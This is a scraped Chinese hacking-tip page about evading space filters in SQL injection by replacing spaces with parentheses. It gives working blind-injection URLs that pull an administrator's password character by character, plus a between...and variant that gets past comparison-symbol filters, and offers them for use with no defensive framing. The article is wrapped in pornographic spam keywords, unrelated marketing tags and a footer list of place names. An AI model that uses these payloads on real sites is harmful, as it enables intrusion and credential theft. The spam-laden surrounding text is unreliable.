婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁(yè) > 知識(shí)庫(kù) > 突破空格的限制

突破空格的限制
熱門標(biāo)簽:客服外呼系統(tǒng)呼叫中心 保定電銷機(jī)器人軟件 土地證宗地圖標(biāo)注符號(hào) 電話機(jī)器人案例 鎮(zhèn)江云外呼系統(tǒng)怎么樣 成都銷售外呼系統(tǒng)公司 vue 地圖標(biāo)注拖拽 自動(dòng)外呼系統(tǒng)怎么防止封卡 電話機(jī)器人銷售公司嗎
關(guān)于空格,有許多替換方式,比如TAB空格,SQL數(shù)據(jù)庫(kù)中的/**/,但我又找到了另一種替換方式,已發(fā)表于《黑客手冊(cè)》2006.7期中,這里挑其精華,現(xiàn)一下吧!

對(duì)于SQL語(yǔ)句,大家還都習(xí)慣于其的空格,比如select id from [name],如果中間沒有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說(shuō)到幾個(gè)空格的替代方法外,我發(fā)現(xiàn)用()括號(hào)在SQL中一樣可以運(yùn)行,比如上面的語(yǔ)句,就可以寫成,select(id)from[name],有括號(hào)分隔,可以正常執(zhí)行。
舉個(gè)例 子說(shuō)一下,我們得到一個(gè)注入點(diǎn):jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語(yǔ)句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實(shí)可以寫成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了和>符號(hào),則用between…and…,語(yǔ)句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對(duì)于中間應(yīng)該出現(xiàn)空格的地方,用()進(jìn)行替換,不過(guò),對(duì)于很復(fù)雜的SQL語(yǔ)句就不太好用了。上面說(shuō)到的是字符型的,如果是數(shù)值型,可以在id=1后加一個(gè)括號(hào),不過(guò)這個(gè)我沒有測(cè)試,比如:jmdcw.asp?id=(1)and(select.....),應(yīng)該是可行的吧?

呵呵,總結(jié)一下,和LOVESHELL上的朋友分享一下。 

標(biāo)簽:內(nèi)江 懷化 成都 重慶 天津 麗江 臺(tái)灣 公主嶺

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《突破空格的限制》,本文關(guān)鍵詞  突破,空格,的,限制,突破,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《突破空格的限制》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于突破空格的限制的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章
    主站蜘蛛池模板: 泽库县| 大悟县| 土默特左旗| 永春县| 林芝县| 宿迁市| 龙陵县| 左云县| 苍南县| 平潭县| 凤阳县| 宜丰县| 潍坊市| 武隆县| 徐水县| 工布江达县| 河池市| 阜新市| 新密市| 和静县| 昂仁县| 犍为县| 中宁县| 手机| 射阳县| 贺州市| 彭州市| 杨浦区| 延川县| 顺昌县| 阜宁县| 彩票| 北流市| 竹山县| 鄯善县| 永济市| 盐源县| 冀州市| 芦溪县| 洛宁县| 长兴县|